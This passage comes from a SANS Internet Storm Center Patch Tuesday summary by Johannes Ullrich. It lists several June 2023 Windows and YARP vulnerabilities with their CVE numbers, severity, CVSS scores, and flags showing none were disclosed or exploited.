Important 7.6 6.6 Windows TPM Device Driver Elevation of Privilege Vulnerability %%cve:2023-29360%% No No - - Important 7.8 6.8 Windows iSCSI Discovery Service Denial of Service Vulnerability %%cve:2023-32011%% No No - - Important 7.5 6.5 Yet Another Reverse Proxy (YARP) Denial of Service Vulnerability %%cve:2023-33141%% No No - - Important 7.5 6.7 iSCSI Target WMI Provider Remote Code Execution Vulnerability %%cve:2023-29367%% No No - - Important 7.8 6.8

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.